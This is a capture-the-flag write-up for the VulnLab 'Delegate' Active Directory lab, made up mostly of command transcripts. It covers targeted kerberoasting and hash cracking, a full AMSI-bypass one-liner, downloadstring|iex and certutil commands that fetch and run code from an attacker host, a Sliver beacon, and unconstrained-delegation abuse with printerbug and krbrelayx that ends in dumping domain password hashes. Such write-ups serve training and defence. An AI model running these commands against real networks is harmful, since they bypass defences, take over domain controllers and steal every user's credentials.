vulnlab-delegate

vulnlab delegate

Delegate is an Medium rated AD machine that’s about exploiting the SeEnableDelegationPrivilege of the compromised user, and creating a machine account with unconstrained delegation.

.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1521148447309334495286952030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)

snip

1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)

.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
Password:
[] User A.Briggs doesn‘t have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn’t have UF_DONT_REQUIRE_PREAUTH set
[] User R.Cooper doesn‘t have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn’t have UF_DONT_REQUIRE_PREAUTH set
[] User N.Thompson doesn’t have UF_DONT_REQUIRE_PREAUTH set
[] invalid principal syntax

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023


5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023


5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023


5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\>

.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

Bloodhound to get more info

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u ‘A.Briggs’ -p ‘P4ssw0rd1#123’ -ns 10.10.114.169

Upload data to Bloodhound, we find

The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

A targeted kerberoast attack can be performed using targetedKerberoast.py.

targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ cd targetedKerberoast
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 -m venv venv
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ ls
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py venv
┌──(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
–snip—
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u ‘A.Briggs’ -p ‘P4ssw0rd1#123’ –request-user N.Thompson -d ‘delegate.vl’
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/targetedKerberoast]
└─$
….

.

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
KALEB_2341 (?)
1g 0:00:00:03 DONE (20240610 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the “–show” option to display all of the cracked passwords reliably
Session completed.

 

Privesc

We can log into the machine with evil-winrm and enumerate N.Thompson’s privileges.

We can see that they have the SeEnableDelegationPrivilege enabled.

We can abuse unconstrained Kerberos delegation in Active Directory (AD) to elevate privileges to SYSTEM. We can use the krbrelayx toolkit, which leverages unconstrained delegation to obtain Ticket Granting Tickets (TGTs) from users connecting to an attacker-controlled host.

First, we need to check to make sure that ldap signing is turned off and there are available machines in the machine quota.

┌──(puck㉿kali)[~/vulnhub/delegate]

└─$ crackmapexec ldap delegate.vl -u ‘N.Thompson’ -p ‘KALEB_2341’ -M maq
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP dc1.delegate.vl 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ dc1.delegate.vl 389 DC1 [*] Getting the MachineAccountQuota
MAQ dc1.delegate.vl 389 DC1 MachineAccountQuota: 10

.

Next, we upload Powermad.ps1  to the machine and use it to set up our attacker controlled machine account and then set the UserAccountControl attribute. We want to set the useraccountcontrol attribute to the value 528384, which includes the TRUSTED_FOR_DELEGATION flag (indicating unconstrained delegation privileges).

Check if AMSI is enabled -> yes

*Evil-WinRM* PS C:\windows\tasks> Import-Module .\PowerView.ps1
This script contains malicious content and has been blocked by your antivirus software.

AMSI bypass

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled

*Evil-WinRM* PS C:\windows\tasks> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\windows\tasks> Get-NetDomain

Forest                  : delegate.vl
DomainControllers       : {DC1.delegate.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC1.delegate.vl
RidRoleOwner            : DC1.delegate.vl
InfrastructureRoleOwner : DC1.delegate.vl
Name                    : delegate.vl

 

.

 

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled

 

Using powermad & printerbug

┌──(puck㉿kali)[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString ‘12345’ -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>

certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe [sliver beacon]

sliver > https –lport 8443

sliver > jobs

ID Name Protocol Port Stage Profile
==== ======= ========== ======
1 https tcp 8443
[*] Beacon 9bc2112c sitecar-3 – 10.10.134.198:50150 (ws01) – windows/amd64 – Wed, 20 Nov 2024 12:31:32 CET

sliver > use 9bc2112c-9bb3-44c5-a1fd-038fff83264e
[*] Active beacon sitecar-3 (9bc2112c-9bb3-44c5-a1fd-038fff83264e)

sliver (sitecar-3) >

$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …
10.10.248.86 – – [20/Nov/2024 10:41:55] “GET /AMSIBypassPatch.ps1 HTTP/1.1” 200 –
10.10.248.86 – – [20/Nov/2024 10:53:37] “GET /PowerView.ps1 HTTP/1.1” 200 –
10.10.248.86 – – [20/Nov/2024 11:11:54] “GET /amsi.txt HTTP/1.1” 200 –

from beacon

sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/AMSIBypassPatch.ps1”)|iex
[*] Tasked beacon sitecar-3 (39a54d03)
[+] sitecar-3 completed task 39a54d03
[*] Command executed successfully
sliver (sitecar-3) >

cat amsi.txt
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like “*iUtils”) {$c=$b}};$d=$c.GetFields(‘NonPublic,Static’);Foreach($e in $d) {if ($e.Name -like “*Context”) {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/amsi.txt”)|iex
[*] Tasked beacon sitecar-3 (305d3b54)
[+] sitecar-3 completed task 305d3b54
[*] Command executed successfully

sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/PowerView.ps1”)|iex
[*] Tasked beacon sitecar-3 (ef02a107)
[+] sitecar-3 completed task ef02a107
[*] Command executed successfully

 

certutil.exe -urlcache -f http://10.8.2.138:8000/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe

So we execute-shellcode -i /payloads/UnmanagedPowerShell.bin , and then we add a dns entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.delegate.vl -Data 10.8.2.138

check with amsi-bypass and PowerView.ps1 if it worked

(new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/AMSIBypassPatch.ps1”)|iex

get-domaincomputer -unconstrained | select distinguishedname, useraccountcontrol

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
At line:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:90
+ ... webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
+                                                                       ~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
*Evil-WinRM* PS C:\windows\tasks> 

*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
*Evil-WinRM* PS C:\windows\tasks> get-domaincomputer -unconstrained | select distinguishedname, useraccountcontrol

distinguishedname                                                             useraccountcontrol
-----------------                                                             ------------------
CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl      SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
CN=PWNED,CN=Computers,DC=delegate,DC=vl        WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION


*Evil-WinRM* PS C:\windows\tasks> 

 

We are going to now get the NTLM hash for the password we set, we can do this with some simple python:

>>> import hashlib
>>> print(hashlib.new(‘md4’, ‘12345’.encode(‘utf-16le’)).hexdigest())
7A21990FCD3D759941E45C490F143D5F

 

setup the listener ( waiting for connection then)

┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[] Unsupported MechType ‘NTLMSSP – Microsoft NTLM Security Support Provider’
[*] SMBD: Received connection from 10.10.105.77
[] Unsupported MechType ‘NTLMSSP – Microsoft NTLM Security Support Provider’

start printerbug

┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u ‘delegate.vl\pwned$’ -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 –action add -dns-ip 10.10.105.77 DC1.delegate.vl
[] Connecting to host…
[] Binding to host
[+] Bind OK
[] Adding new record
[+] LDAP operation completed successfully
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py ‘DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache’ krbrelayx.py LICENSE printerbug.py venv
bloodyAD dnstool.py lib PetitPotam README.md
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/‘PWNED$’@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 – Copyright 2023 Fortra
Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
┌──(venv)(puck㉿kali)[~/vulnhub/delegate/krbrelayx]

use impacket-secrectsdump to get the hashes.

┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ klist
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL
Valid starting Expires Service principal
06/12/2024 07:13:23 06/12/2024 17:07:36 krbtgt/DELEGATE.VL@DELEGATE.VL
renew until 06/19/2024 07:07:36
┌──(puck㉿kali)[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up…
.

That’s it! We created a machine account with unconstrained delegation privileges. We then used that machine to intercept the Domain Controller’s (DC) Kerberos Ticket Granting Ticket (TGT). Using that ticket, we were able to authenticate as the DC and dump all of the password hashes.

After rooting the box verified if Defender was enabled on box : yes

*Evil-WinRM* PS C:\windows\tasks> get-mpcomputerstatus
AMEngineVersion                  : 1.1.23080.2005
AMProductVersion                 : 4.18.23080.2006
AMRunningMode                    : Normal
AMServiceEnabled                 : True
AMServiceVersion                 : 4.18.23080.2006
AntispywareEnabled               : True
AntispywareSignatureAge          : 415
AntispywareSignatureLastUpdated  : 10/2/2023 5:06:19 AM

 

Resources

https://github.com/ShutdownRepo/targetedKerberoast
https://hashcat.net/wiki/doku.php?id=example_hashes
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://github.com/Kevin-Robertson/Powermad
https://github.com/okankurtuluss/amsibypasspatch

.